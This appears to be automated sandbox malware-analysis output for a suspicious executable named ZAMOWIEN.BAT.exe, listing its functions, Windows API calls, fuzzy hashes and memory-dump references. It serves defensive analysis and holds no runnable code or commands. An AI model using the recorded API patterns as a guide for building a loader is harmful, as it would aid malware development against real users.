Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction ID: c32d218b6638122aa4ce4f80c66fba6d2406c7980228c3b631cb8ccc2677eb8e
Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction Fuzzy Hash: 22F09076700204BFDB008F59ED05E9AB7BCEBA5710F11803EFA01E7181E6B099548764

Function 0040337C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403328,000000FF,00000000,00000000,?,?), ref: 004033A1

Strings

07y, xrefs: 004033F6

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: FilePointer
String ID: 07y
API String ID: 973152223-1660179758
Opcode ID: 45a42d16453a97052fd4caa7026d0e6d984ebdece06a60444948986a081c5d5b
Instruction ID: 4a37cd90d8c6e477417dc21e96f3e2d83def6ffdce0c4911f0ed58b6404d37f7
Opcode Fuzzy Hash: 45a42d16453a97052fd4caa7026d0e6d984ebdece06a60444948986a081c5d5b
Instruction Fuzzy Hash: 1D319F70101209FFDF129F95ED84A9E7FA8EB04359F20803AF905EA191D678CE51DBA9

Function 00406556 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,004067C7,80000002), ref: 0040659C
RegCloseKey.KERNELBASE(?,?,?), ref: 004065A7

Strings

Call, xrefs: 0040655D

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: c7bbc9debe44ed0ded3763b920631807c131ebf5032de0f94b29e3b70990b652
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 04015A72510209FEDF218F55DD09EDB3BA8EB54364F01803AF91AA2190D738DA68DBA4

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d81425f99c47e39cb0b701e1691743acae5d6e146e4165746460704aa1483f0f
Instruction ID: 7cd7f7c50a3872a915bf5743fb7b2058cfc7604c1fd4f382db6a7ef25400a29e
Opcode Fuzzy Hash: d81425f99c47e39cb0b701e1691743acae5d6e146e4165746460704aa1483f0f
Instruction Fuzzy Hash: 3D01D1326242109BE7095B389D04B6B36A8F791315F10867AB851F62F1DA788C429B48

Function 00405BDC Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405C1E
GetLastError.KERNEL32 ref: 00405C2C

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction ID: 04bb8aa1cc0aca2d0eaa3ad2e941e579798f83e936e7895d473af5d327c614de
Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction Fuzzy Hash: A2F0F4B0C0420DDAEF00CFA4D5487EFBBB4FB04309F00802AD541B6281D7B882088BA9

Function 00405C6B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4790,?), ref: 00405C94
CloseHandle.KERNEL32(?), ref: 00405CA1

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 7021c5748c445b32f1b75d59fa194ddc1290dd09636498aa6d54045d02407b2e
Instruction ID: ce772ed75beb60998b53dc08c09fc09edba665df9f69e708b07ce0f87aa0093e
Opcode Fuzzy Hash: 7021c5748c445b32f1b75d59fa194ddc1290dd09636498aa6d54045d02407b2e
Instruction Fuzzy Hash: 21E04FF0900209BFFB009BA0ED09F7B7B6CF741204F008421BD04F2151D77898048A78

Function 00406A7C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040375B,0000000C), ref: 00406A8E
GetProcAddress.KERNEL32(00000000,?), ref: 00406AA9

Part of subcall function 00406A0C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A23
Part of subcall function 00406A0C: wsprintfW.USER32 ref: 00406A5E
Part of subcall function 00406A0C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A72

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction ID: a8f4802470dd0b5d3fee9495424e5e46edeb2c80bdac4206b8fac7462ff861fc
Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction Fuzzy Hash: 3FE08636704210AAD611A6719E48D2773AC9F86750302843EF942F2141DB38DC32AEA9

Function 00406178 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00403118,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040617C
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040619E

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15

Function 00405C36 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040363E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405C3C
GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405C4A

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction ID: 16b82f8e35fddb8c9d736b627852558f5b7066616e4619afecfa9d37d551b0bb
Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction Fuzzy Hash: 29C04C30648601DAEA105B719F0CB177A51BB54781F154439E582F41A4DA348455DD2D

Function 6E352B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6E352C57

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f6d3b991cac9e7c2bc3ba79e619443bd241973ea852ffdc6ccee1e17e8ab53f4
Instruction ID: b39b4e152b62cbd68b34480dda920dbea9bbeb5a01ef39d9e53cc3c291e658da
Opcode Fuzzy Hash: f6d3b991cac9e7c2bc3ba79e619443bd241973ea852ffdc6ccee1e17e8ab53f4
Instruction Fuzzy Hash: 03415DB1904744EFDF119FE4DA85F9937BCEB46368F308865E80587310DB39A4A1DB91

Function 004061FB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,00793730,0078B730,00403600,?,?,00403504,00793730,00004000,?,00000000,004033AE), ref: 0040620F

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: fc560a7afe38849c9814d2abec89c2cf6d06c3385e7adc2b23a750c1e33b7449
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: E7E08C3261021ABBCF10AE50AC00AEB3BACEB053A0F01487AF912E3040D234E82187A4

Function 0040622A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,0079097F,0078B730,00403584,0078B730,0079097F,0040CE68,00793730,00004000,?,00000000,004033AE), ref: 0040623E

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 679f045a01091b3bffd6ce03f0c021b101ab6dc40d56b3d6f17c8d80975ea80a
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: E4E08C3220021AEBCF20BF508C00EEB7BADEB413A0F05447AF91AE2090D234E92497A4

Function 6E352A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6E35505C,00000004,00000040,6E35504C), ref: 6E352A9D

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e99d23e2c2d06683aa3e59cbbabf14636ecd1da51cf2c20b67ebc6c3469abeca
Instruction ID: 98e5ca272c444fe4e690847d145ad9a14032d1231b5e56fd8ab5ba8e3a16a4dc
Opcode Fuzzy Hash: e99d23e2c2d06683aa3e59cbbabf14636ecd1da51cf2c20b67ebc6c3469abeca
Instruction Fuzzy Hash: 1BF0AEF0905B80FECBA0CF68C844B0A3BE8B70A325B3445EAE188DB340E3347454CB91

Function 004064F5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406583,?,?,?,?,Call,?,00000000), ref: 00406519

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 00d0e59c7e8c32caf741361cfbc3e2fda59707e438a7f9ca6dec15e91b5c489a
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: D8D0173204020DBBDF119F90AD05FAB3B6DAB08310F014826FE06A90A2D776D670AB68

Function 00404653 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00404665

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
